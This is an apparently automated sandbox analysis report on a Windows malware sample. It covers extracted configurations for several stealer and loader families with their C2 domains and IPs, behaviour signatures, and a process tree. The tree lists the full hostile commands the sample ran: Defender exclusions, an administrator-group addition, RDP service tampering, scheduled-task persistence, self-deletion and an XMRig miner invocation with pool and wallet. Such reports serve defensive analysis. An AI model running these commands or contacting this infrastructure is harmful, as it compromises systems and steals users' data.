Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 17:03

General

  • Target

    21fbb712aab6d4e991d123a1e9c0cedf.exe

  • Size

    311KB

  • MD5

    21fbb712aab6d4e991d123a1e9c0cedf

  • SHA1

    127cba0dbc74422e00f431f42a2713cf108b9cb4

  • SHA256

    d3184ceae376a789ccd61e767da3f21cacd72dfc7162a5e1a9569c7244d0bf9a

  • SHA512

    dca4b74ec7107d982829a9a697570ffef8b4eb7e59b2fe9139ab5a4f655062f421fc6897d99ffc2275e15d3c4ab7f61bfb9ecc9a3485a440c0d0fd86e22f57ce

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://honawey7.xyz/

http://wijibui0.xyz/

http://hefahei6.xyz/

http://pipevai4.xyz/

http://nalirou7.xyz/

http://xacokuo8.xyz/

http://hajezey1.xyz/

http://gejajoo7.xyz/

http://sysaheu9.xyz/

http://rixoxeu9.xyz/

rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Extracted

Family

vidar

Version

41.3

Botnet

1033

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    1033

Extracted

Family

redline

Botnet

MegaProliv2

C2

93.115.20.139:28978

Extracted

Family

raccoon

Botnet

7ebf9b416b72a203df65383eec899dc689d2c3d7

Attributes
  • url4cnc

    http://telegatt.top/agrybirdsgamerept

    http://telegka.top/agrybirdsgamerept

    http://telegin.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 4 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe
    "C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe
      "C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4264
  • C:\Users\Admin\AppData\Local\Temp\FB68.exe
    C:\Users\Admin\AppData\Local\Temp\FB68.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4484
    • C:\Users\Admin\AppData\Local\Temp\FB68.exe
      C:\Users\Admin\AppData\Local\Temp\FB68.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4648
  • C:\Users\Admin\AppData\Local\Temp\5C9.exe
    C:\Users\Admin\AppData\Local\Temp\5C9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3224
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kxqfrvka\
      2⤵
        PID:696
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cidgpyyt.exe" C:\Windows\SysWOW64\kxqfrvka\
        2⤵
          PID:1280
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kxqfrvka binPath= "C:\Windows\SysWOW64\kxqfrvka\cidgpyyt.exe /d\"C:\Users\Admin\AppData\Local\Temp\5C9.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1808
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description kxqfrvka "wifi internet conection"
            2⤵
              PID:2348
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start kxqfrvka
              2⤵
                PID:2664
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4180
              • C:\Users\Admin\AppData\Local\Temp\A3F.exe
                C:\Users\Admin\AppData\Local\Temp\A3F.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:3940
              • C:\Users\Admin\AppData\Local\Temp\10E7.exe
                C:\Users\Admin\AppData\Local\Temp\10E7.exe
                1⤵
                • Executes dropped EXE
                PID:3164
              • C:\Users\Admin\AppData\Local\Temp\158C.exe
                C:\Users\Admin\AppData\Local\Temp\158C.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:1564
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im 158C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\158C.exe" & del C:\ProgramData\*.dll & exit
                  2⤵
                    PID:2964
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im 158C.exe /f
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2708
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4104
                • C:\Windows\SysWOW64\kxqfrvka\cidgpyyt.exe
                  C:\Windows\SysWOW64\kxqfrvka\cidgpyyt.exe /d"C:\Users\Admin\AppData\Local\Temp\5C9.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3836
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:5024
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2124
                • C:\Users\Admin\AppData\Local\Temp\1FBE.exe
                  C:\Users\Admin\AppData\Local\Temp\1FBE.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4168
                • C:\Users\Admin\AppData\Local\Temp\3441.exe
                  C:\Users\Admin\AppData\Local\Temp\3441.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2576
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4752
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndfl5uh0\ndfl5uh0.cmdline"
                      3⤵
                        PID:5068
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF6.tmp" "c:\Users\Admin\AppData\Local\Temp\ndfl5uh0\CSC1B346A062D664465A9BE93DECB3C6E9D.TMP"
                          4⤵
                            PID:4204
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                          3⤵
                            PID:3488
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                            3⤵
                              PID:4228
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                              3⤵
                                PID:4672
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                3⤵
                                  PID:1068
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                  3⤵
                                  • Modifies registry key
                                  PID:2544
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                  3⤵
                                    PID:2348
                                  • C:\Windows\SysWOW64\net.exe
                                    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                    3⤵
                                      PID:5060
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                        4⤵
                                          PID:4208
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                        3⤵
                                          PID:4276
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start rdpdr
                                            4⤵
                                              PID:1972
                                              • C:\Windows\SysWOW64\net.exe
                                                net start rdpdr
                                                5⤵
                                                  PID:2656
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 start rdpdr
                                                    6⤵
                                                      PID:2648
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                3⤵
                                                  PID:1868
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c net start TermService
                                                    4⤵
                                                      PID:5020
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net start TermService
                                                        5⤵
                                                          PID:1508
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 start TermService
                                                            6⤵
                                                              PID:4464
                                                  • C:\Users\Admin\AppData\Local\Temp\3849.exe
                                                    C:\Users\Admin\AppData\Local\Temp\3849.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1208
                                                    • C:\Users\Admin\AppData\Local\Temp\3849.exe
                                                      C:\Users\Admin\AppData\Local\Temp\3849.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4776
                                                  • C:\Users\Admin\AppData\Local\Temp\44CD.exe
                                                    C:\Users\Admin\AppData\Local\Temp\44CD.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:3752
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 912
                                                      2⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3844
                                                  • C:\Users\Admin\AppData\Local\Temp\4B66.exe
                                                    C:\Users\Admin\AppData\Local\Temp\4B66.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:1316
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 340
                                                      2⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4100
                                                  • C:\Users\Admin\AppData\Local\Temp\5615.exe
                                                    C:\Users\Admin\AppData\Local\Temp\5615.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3672
                                                  • C:\Users\Admin\AppData\Local\Temp\6086.exe
                                                    C:\Users\Admin\AppData\Local\Temp\6086.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:4012
                                                    • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:3708
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                        3⤵
                                                          PID:3184
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                            4⤵
                                                              PID:2388
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:2188
                                                          • C:\ProgramData\2103609787\2103609787.exe
                                                            "C:\ProgramData\2103609787\2103609787.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:876
                                                            • C:\Users\Admin\AppData\Local\Temp\Trader4.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Trader4.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:1468
                                                              • C:\Windows\System32\conhost.exe
                                                                "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Trader4.exe"
                                                                5⤵
                                                                  PID:388
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                    6⤵
                                                                      PID:2700
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                        7⤵
                                                                          PID:4984
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                          7⤵
                                                                            PID:640
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                                                                          6⤵
                                                                            PID:4068
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                                                                              7⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:4712
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "cmd" cmd /c "C:\Users\Admin\services32.exe"
                                                                            6⤵
                                                                              PID:708
                                                                              • C:\Users\Admin\services32.exe
                                                                                C:\Users\Admin\services32.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:4472
                                                                                • C:\Windows\System32\conhost.exe
                                                                                  "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
                                                                                  8⤵
                                                                                    PID:4420
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                      9⤵
                                                                                        PID:4964
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                          10⤵
                                                                                            PID:1012
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                          9⤵
                                                                                            PID:2388
                                                                          • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            PID:1128

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v6

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\ProgramData\2103609787\2103609787.exe

                                                                            MD5

                                                                            4058a27cf325710ab5a9020fe95e57f7

                                                                            SHA1

                                                                            975563bdd270c6a3ff2fd7f6befdfb31d7cecc5f

                                                                            SHA256

                                                                            9f5f9e5ba636fdea5ddece4718c97ac619d0e4f135ae2a1e3da0a8886aa8efc2

                                                                            SHA512

                                                                            df18aecac0ca2e42e621c36e789c7bcb44a11cf200e632dd9d526c5e3a2e26a500a705d5b09a0053fe606547b33e138d90cfeeac8f95f5b203757ea3177319ea

                                                                          • C:\ProgramData\2103609787\2103609787.exe

                                                                            MD5

                                                                            4058a27cf325710ab5a9020fe95e57f7

                                                                            SHA1

                                                                            975563bdd270c6a3ff2fd7f6befdfb31d7cecc5f

                                                                            SHA256

                                                                            9f5f9e5ba636fdea5ddece4718c97ac619d0e4f135ae2a1e3da0a8886aa8efc2

                                                                            SHA512

                                                                            df18aecac0ca2e42e621c36e789c7bcb44a11cf200e632dd9d526c5e3a2e26a500a705d5b09a0053fe606547b33e138d90cfeeac8f95f5b203757ea3177319ea

                                                                          • C:\ProgramData\freebl3.dll

                                                                            MD5

                                                                            ef2834ac4ee7d6724f255beaf527e635

                                                                            SHA1

                                                                            5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                            SHA256

                                                                            a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                            SHA512

                                                                            c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                          • C:\ProgramData\mozglue.dll

                                                                            MD5

                                                                            8f73c08a9660691143661bf7332c3c27

                                                                            SHA1

                                                                            37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                            SHA256

                                                                            3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                            SHA512

                                                                            0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                          • C:\ProgramData\msvcp140.dll

                                                                            MD5

                                                                            109f0f02fd37c84bfc7508d4227d7ed5

                                                                            SHA1

                                                                            ef7420141bb15ac334d3964082361a460bfdb975

                                                                            SHA256

                                                                            334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                            SHA512

                                                                            46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                          • C:\ProgramData\nss3.dll

                                                                            MD5

                                                                            bfac4e3c5908856ba17d41edcd455a51

                                                                            SHA1

                                                                            8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                            SHA256

                                                                            e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                            SHA512

                                                                            2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                          • C:\ProgramData\softokn3.dll

                                                                            MD5

                                                                            a2ee53de9167bf0d6c019303b7ca84e5

                                                                            SHA1

                                                                            2a3c737fa1157e8483815e98b666408a18c0db42

                                                                            SHA256

                                                                            43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                                                                            SHA512

                                                                            45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                                                                          • C:\ProgramData\vcruntime140.dll

                                                                            MD5

                                                                            7587bf9cb4147022cd5681b015183046

                                                                            SHA1

                                                                            f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                            SHA256

                                                                            c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                            SHA512

                                                                            0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                            MD5

                                                                            84f2160705ac9a032c002f966498ef74

                                                                            SHA1

                                                                            e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                                            SHA256

                                                                            7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                                            SHA512

                                                                            f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                            MD5

                                                                            1ac24e18ba8f28294b03a8b9dd9c69b2

                                                                            SHA1

                                                                            0a734cc87ca04f2643803cfeb970e6d0b971a2b1

                                                                            SHA256

                                                                            950b820b242f63a957f37d804051a7e7ebfffffecb4538556e7b940eaefefd2c

                                                                            SHA512

                                                                            2d267526a5fe91f718dacb7d6d04fec5f2aa3bacebb4974fee73e405f203e514666a44da8e34328cee2b30a3c857130f2a9f70faf23ff4ebbeb1f6dac5f91ef0

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3849.exe.log

                                                                            MD5

                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                            SHA1

                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                            SHA256

                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                            SHA512

                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            MD5

                                                                            6ae8936dea8f92df3b2de7eec57aebdd

                                                                            SHA1

                                                                            e8a3f0ae957d8e8722d5ed313fd767dfd05e9ffe

                                                                            SHA256

                                                                            5ce946bbb9f4c79eb9b327048248d31ba0f9fdff4e627029f89414042047fde8

                                                                            SHA512

                                                                            6996c5d6c8484b1bc7365ab926254c9790e73a54b680a28897b1c4b8a948ec853616f96e821c4452aa5d1be125e1ead60b74880b3acbc9d709f32e88db18826c

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            MD5

                                                                            f3068198b62b4b70404ec46694d632be

                                                                            SHA1

                                                                            7b0b31ae227cf2a78cb751573a9d07f755104ea0

                                                                            SHA256

                                                                            bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8

                                                                            SHA512

                                                                            ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            MD5

                                                                            6af6c2bb987e23579488d6054cca175d

                                                                            SHA1

                                                                            f19b6c887eb21ab4d55842b1f404a0a3f4c10203

                                                                            SHA256

                                                                            25a6ebf14c81235e4c7391ddd19e60d6ef42e98f21d686d92657a8cadd6dc966

                                                                            SHA512

                                                                            09889faa6c9dd4041d4be43b76aeac0d38be2a0952777f683916b633cb30703d21c211d15aeb91be412cf333c9949b5c0fbb9527823b85148f421612da2f5475

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            MD5

                                                                            468a961cc25fb492a0c0ccdd883dccb0

                                                                            SHA1

                                                                            888fa24357d11881a1184ebcde934620b5e3c7e2

                                                                            SHA256

                                                                            83435aa89a70d0be9decdda7149ddb17a94dd0abd94495a3d368f98704968f87

                                                                            SHA512

                                                                            6b5bc47cabc3b5efe6d72935cddf72b3a0429a6132e19380f2f2aba58736d43cd586d9e08bffc893640ca5525709a4f7cc374b9224067ab2a0c3b5fdd17b4feb

                                                                          • C:\Users\Admin\AppData\Local\Temp\10E7.exe

                                                                            MD5

                                                                            4ddce1574ea6e7b9d9d70f9c6f23a1c9

                                                                            SHA1

                                                                            89a9b86f4ffb646bf9856584292a42c5db14da26

                                                                            SHA256

                                                                            cb3be2979c500241fb4fae88ac0773a56745aa2807ba5c2970370b09d32231f3

                                                                            SHA512

                                                                            7a5beeac769961e393349ab2330f467edbacebf7b713883539eaf76792cdb978724d763ad1c3d54b4f79da32276ab466f2f844790020ecaf546e0fffaeb1f64d

